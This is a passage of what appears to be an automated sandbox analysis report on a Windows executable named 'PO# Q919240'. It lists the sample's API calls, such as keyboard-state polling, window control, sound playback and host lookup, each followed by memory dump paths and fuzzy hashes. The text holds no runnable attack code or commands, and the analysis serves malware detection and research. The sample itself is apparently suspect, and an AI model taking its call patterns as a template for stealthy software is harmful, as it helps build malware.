                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                • DeleteObject.GDI32(?), ref: 004301D0
                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                • String ID:
                • API String ID: 3969911579-0
                • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                • String ID: 0
                • API String ID: 956284711-4108050209
                • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                • String ID: 0.0.0.0
                • API String ID: 1965227024-3771769585
                • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                APIs
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: SendString$_memmove_wcslen
                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                • API String ID: 369157077-1007645807
                • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                APIs
                • GetParent.USER32 ref: 00445BF8
                • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                • __wcsicoll.LIBCMT ref: 00445C33
                • __wcsicoll.LIBCMT ref: 00445C4F
                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsicoll$ClassMessageNameParentSend
                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                • API String ID: 3125838495-3381328864
                • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                APIs
                • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                • SendMessageW.USER32(?,00000402,?), ref: 00449399
                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$CharNext
                • String ID:
                • API String ID: 1350042424-0
                • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                APIs
                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                • _wcscpy.LIBCMT ref: 004787E5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                • API String ID: 3052893215-2127371420
                • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                APIs
                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                • __swprintf.LIBCMT ref: 0045E7F7
                • _wprintf.LIBCMT ref: 0045E8B3
                • _wprintf.LIBCMT ref: 0045E8D7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                • API String ID: 2295938435-2354261254
                • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __swprintf_wcscpy$__i64tow__itow
                • String ID: %.15g$0x%p$False$True
                • API String ID: 3038501623-2263619337
                • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                APIs
                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                • __swprintf.LIBCMT ref: 0045E5F6
                • _wprintf.LIBCMT ref: 0045E6A3
                • _wprintf.LIBCMT ref: 0045E6C7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                • API String ID: 2295938435-8599901
                • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                APIs
                • timeGetTime.WINMM ref: 00443B67
                  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                • Sleep.KERNEL32(0000000A), ref: 00443B9F
                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                • SetActiveWindow.USER32(00000000), ref: 00443BEC
                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                • Sleep.KERNEL32(000000FA), ref: 00443C2D
                • IsWindow.USER32(00000000), ref: 00443C3A
                • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                • String ID: BUTTON
                • API String ID: 1834419854-3405671355
                • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                • LoadStringW.USER32(00000000), ref: 00454040
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • _wprintf.LIBCMT ref: 00454074
                • __swprintf.LIBCMT ref: 004540A3
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                • API String ID: 455036304-4153970271
                • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                APIs
                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                • _memmove.LIBCMT ref: 00467EB8
                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                • _memmove.LIBCMT ref: 00467F6C
                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                • String ID:
                • API String ID: 2170234536-0
                • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                APIs
                • GetKeyboardState.USER32(?), ref: 00453CE0
                • SetKeyboardState.USER32(?), ref: 00453D3B
                • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                • GetKeyState.USER32(000000A0), ref: 00453D75
                • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                • GetKeyState.USER32(000000A1), ref: 00453DB5
                • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                • GetKeyState.USER32(00000011), ref: 00453DEF
                • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                • GetKeyState.USER32(00000012), ref: 00453E26
                • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                • GetKeyState.USER32(0000005B), ref: 00453E5D
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: State$Async$Keyboard
                • String ID:
                • API String ID: 541375521-0
                • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                APIs
                • GetDlgItem.USER32(?,00000001), ref: 004357DB
                • GetWindowRect.USER32(00000000,?), ref: 004357ED
                • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                • GetDlgItem.USER32(?,00000002), ref: 0043586A
                • GetWindowRect.USER32(00000000,?), ref: 0043587C
                • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                • GetWindowRect.USER32(00000000,?), ref: 004358EE
                • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                • GetDlgItem.USER32(?,000003EA), ref: 00435941
                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                Similarity
                • API ID: Window$ItemMoveRect$Invalidate
                APIs
                • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                • DeleteObject.GDI32(?), ref: 0047151E
                • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                • DeleteObject.GDI32(?), ref: 004715EA
